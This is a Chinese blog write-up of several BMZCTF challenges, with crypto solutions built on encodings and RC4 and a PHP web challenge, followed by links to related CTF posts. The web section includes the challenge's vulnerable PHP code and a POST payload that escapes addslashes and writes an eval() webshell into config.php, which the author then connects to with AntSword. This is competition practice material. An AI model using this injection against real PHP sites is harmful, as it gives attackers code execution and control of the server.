代码编织梦想

第二届BMZCTF网络安全公开赛

今天事情比较多,所以基本没做,上线了一会就,没做几道题


Crypto

  • DO_YOU_KNOW_IT

题目附件
链接:https://pan.baidu.com/s/10DmirLYb1Z49wEtShHrh7Q
提取码:9y29
打开附件发现是LaTeX数学符号,一 一对照后为:
在这里插入图片描述

flag{\prod \ltimes \aleph y _{-}\wp \infty \therefore \heartsuit _{-}\Longleftarrow \aleph\Theta \eth \Xi }

取每个的首字母,结果为
flag{Play_with_LaTeX}

  • 签到题

题目附件
链接:https://pan.baidu.com/s/1iRI3PlLxgtKdd2DRuzf2ZA
提取码:rwv6
打开附件发现一串密文:
56465a7757464977546d464e656b354b5632786b5346457862336c4f4d4842485632785a4d6c5a47556c46554d557057556a464e656c5a466146465756444135554651774f5642525054303d
base一把梭就可以了

step1======> base16
VFZwWFIwTmFNek5KV2xkSFExb3lOMHBHV2xZMlZGUlFUMUpWUjFNelZFaFFWVDA5UFQwOVBRPT0=
step2======> base64
TVpXR0NaMzNJWldHQ1oyN0pGWlY2VFRQT1JVR1MzVEhQVT09PT09PQ==
step3======> base64
MZWGCZ33IZWGCZ27JFZV6TTPORUGS3THPU======
step4======> base32
flag{Flag_Is_Nothing}

结果:flag{Flag_Is_Nothing}

  • SIMPLE

题目附件
链接:https://pan.baidu.com/s/1IyXd4OsxvWU9xCT7Ym6wvQ
提取码:hkmn
爆破出附件simple.zip的密码为:2022go
在这里插入图片描述
解压压缩包,发现两个文件,一个是key.txt,一个是okay.jpg,010打开okay.jpg,在末尾处发现一串RC4加密的字符:
U2FsdGVkX19+KmR+JLpq0l/IJ+rVlIHN2T+yqAikL04yjA==

在这里插入图片描述
key.txt中发现base64编码,解码得到RC4解密需要用到的key:babyhappy
在这里插入图片描述

RC4解码
在这里插入图片描述
flag{You_Guess_It}

Web

  • EASY_PHP

题目:

  <?php
highlight_file(__FILE__);
error_reporting(0);

function new_addslashes($string) {
     if(!is_array($string)) return addslashes($string);
     foreach($string as $key => $val) $string[$key] = new_addslashes($val);
     return $string;
 }
if(!get_magic_quotes_gpc()) {
    $_POST = new_addslashes($_POST);
    $_GET = new_addslashes($_GET);
    $_REQUEST = new_addslashes($_REQUEST);
    $_COOKIE = new_addslashes($_COOKIE);
}
if(isset($_POST['sudo'])) {
    $file = __DIR__ .'/config.php';
    require $file;
    $key = $_POST['info']['name'];
    if(!isset($LANG[$key])) {
        $content = file_get_contents($file);
        $content = substr($content,0,-3);
        $data = $content."\n\$LANG['$key'] = '$_POST[no1]';\n?>";
        file_put_contents($file,$data);
    } elseif(isset($LANG[$key]) && $LANG[$key]!=$_POST['no1']) {
        $content = file_get_contents($file);
        $content = str_replace($LANG[$key],$_POST['no1'],$content);
        file_put_contents($file,$content);
    }
}
if(isset($_GET['re'])){
    file_put_contents("./config.php",base64_decode("PD9waHAKJExBTkdbJ21lbWJlcl9tYW5hZ2UnXSA9ICdhZG1pbic7Cj8+Cg=="));
}

解题过程
POST传参会被addslashes,第一次是写进去,第二次是str_replace。想办法逃逸出单引号:

$content."\n\$LANG['$key'] = '$_POST[no1]';\n?>";

第一次传的话单引号会变成\'然后写进去,第二次传会把'xxxxxx给替换成\'xxxx

string(30) "';eval($_POST[0]);phpinfo();//" string(31) "\';eval($_POST[0]);phpinfo();//"

这样就两个\\,单引号逃出转义了。

打2次然后config.php命令执行即可。

sudo=&info[name]=qi&no1=';eval($_POST[0]);phpinfo();//

在这里插入图片描述
蚁剑连接
在这里插入图片描述
找到flag文件
在这里插入图片描述
到此结束

版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/justruofeng/article/details/122271045

抛砖引玉 BMZCTF渗透测试公开赛WP复现学习-爱代码爱编程

抛砖引玉 BMZCTF渗透测试公开赛WP复现学习 背景:上周末参加了BMZCTF的渗透测试公开赛,比赛是解BMZCTF靶场中综合渗透的一道题,比赛后官方发了WP,跟着做了一遍,出现了一些问题,写出来抛砖引玉,求指导。 思路:1.官方预期解法(这……我做出来的和解法效果不一样,求大佬指点)            2.非预期解法——广州航海学院

BMZCTF [2020首届祥云杯]带音乐家-爱代码爱编程

下载附件,为一个压缩包,里面有两个文件,其中一个是带密码加密的压缩包,试了伪加密,无法解出,我们只能从另一个文件中解聘密码了。 用010editor打开。发现文件头为: 百度搜了下,为MIDI文件的文件头。 可以确定为MIDI音频文件。试了AudacityPortable,没有发现有用的东西。 再百度下有关MIDI的内容: 我们需要对内容

BMZCTF:flag就在这-爱代码爱编程

题目下载出来是个压缩包,解压exp,出来flag就在这.zip,继续解压,这时候显示压缩包已损坏或压缩格式未知,无法打开。 考虑到此题是misc题,压缩包文件头可能被破坏,导致压缩包解压不下来,我们可以将文件拖到010editor(010Editor是一款快速且强大的十六进制编辑器。用来编辑二进制文件。有一个友好易于使用的界面,无限次的undo和

CTF密码题思路与多种做法(CyberChef、Ciphey)-爱代码爱编程

文章目录 一、题目描述与分析二、在线网站做法三、CyberChef四、CipheyLaTeX 一、题目描述与分析 来源: BMZCTF第二届网络安全公开赛,主办单位:白帽子社区 · WHT战队,2022年1月1日 签到题 下载下来一段: 56465a7757464977546d464e656b354b5632786b5346457862

CTFmisc图像题(zsteg取zip、压缩包重组、IDAT数据隐写、Markdown编写LaTeX、零宽字节隐写)-爱代码爱编程

文章目录 一、题目描述二、题目分析与完成zsteg取zip压缩包重组IDAT数据隐写Markdown编写LaTeX二维码Version零宽字节隐写三、BMZCTF其他赛题wp 一、题目描述 BMZCTF第二届网络安全公开赛,主办单位:白帽子社区 · WHT战队,2022年1月1日,白帽杯 misc 题目名称:游戏秘籍 题目说明:做为程序

第二届BMZCTF公开赛REVERSE的bmzre-爱代码爱编程

第二届BMZCTF公开赛REVERSE的bmzre . .下载附件后照例扔入 exeinfope 中查看信息: . .32 为无壳,照例扔入 IDA 中查看伪代码,有 main 函数看 main 函数: . .单个流程就是上面这样操作了,可是堆栈不平衡的地方不止一个,那就用脚本批量操作: 该花指令的特征就是 call xxxx push 12h ad

第二届BMZCTF公开赛CRYPTO的DO_YOU_KNOW_IT-爱代码爱编程

第二届BMZCTF公开赛CRYPTO的DO_YOU_KNOW_IT . .下载附件后是一张图片,图片内容看起来像数学符号,后来查了资料后发现是 latex 数学符号,与latex 结合的密码学,长见识了: . .用在线 latex 编辑器 来识别图片转成 latex 公式: . .整理了半天,第二个向上左拐的还是没找到,但大致整理出来了: flag

文件上传漏洞-爱代码爱编程

文件上传 文件上传是现代互联网常见的功能,允许用户上传图片、视频、及其他类型文件,向用户提供的功能越多,Web受攻击的风险就越大。 文件上传漏洞 上传文件时,如果未对上传的文件进行严格的验证和过滤,就容易造成文件上传漏洞,上传脚本文件(包括asp、aspx、php、jsp等)恶意上传行为可能导致网站甚至整个服务器被控制。恶意的脚本文件又被称为W

王道计算机网络学习笔记-爱代码爱编程

计算机网络知识点 1.计算机网络基础概念1.计算机网络的概念2.计算机网络的功能3.计算机网络的组成3.计算机网络的分类4.总结2.标准1.标准的分类2.标准化工作3.标准化工作相关组织4.总结3.性能指标1.速率2.带宽3.吞吐量4.时延5.时延带宽积6.往返时延RTT7.利用率4.分层1.怎么分层?2.正式认识分层结构3.OSI参考模型1.应用

从事网络安全等保测评 这个证大学生也可以考-爱代码爱编程

雨笋君近期收到不少咨询等保测评师考试认证的问题。转行者想要通过掌握等保测评相关技能进入网络安全行业,让自身能力提升一个台阶,物质上也能加薪;网安相关企业为了开拓等保测评业务申请等保测评机构资质认证,要求员工考等保测评师。而大部分人对等保测评师认证报考条件都存在一知半解。       等保测评师证含金量多高大家都知道,经过国家认证,是

《Web安全之深度学习实战》笔记:第七章 负面评论识别-爱代码爱编程

        本小节讲述通过imdb数据集,使用第六章提到的词集法、词袋法和TF-IDF法,以及新的Word2Vec和DocVec法进行特征提取,分别构建朴素贝叶斯(NB)、支持向量机(SVM)、随机森林(RF)、深度学习算法(DNN,CNN,RNN)模型来识别负面评论。   一、数据集         测试数据来自互联网电影资料库(Interne

MS17-010漏洞复现-爱代码爱编程

目录 ms17-010 简介 环境 漏洞复现 msfconsole nmap 漏洞修复 ms17-010 简介 永恒之蓝(MS17-010),他的爆发源于WannaCry勒索病毒的诞生。 该病毒是不法分子利用NSA(National Security Agency,美国国家安全局)泄露的危险漏洞“EternalBlue”(永恒之蓝)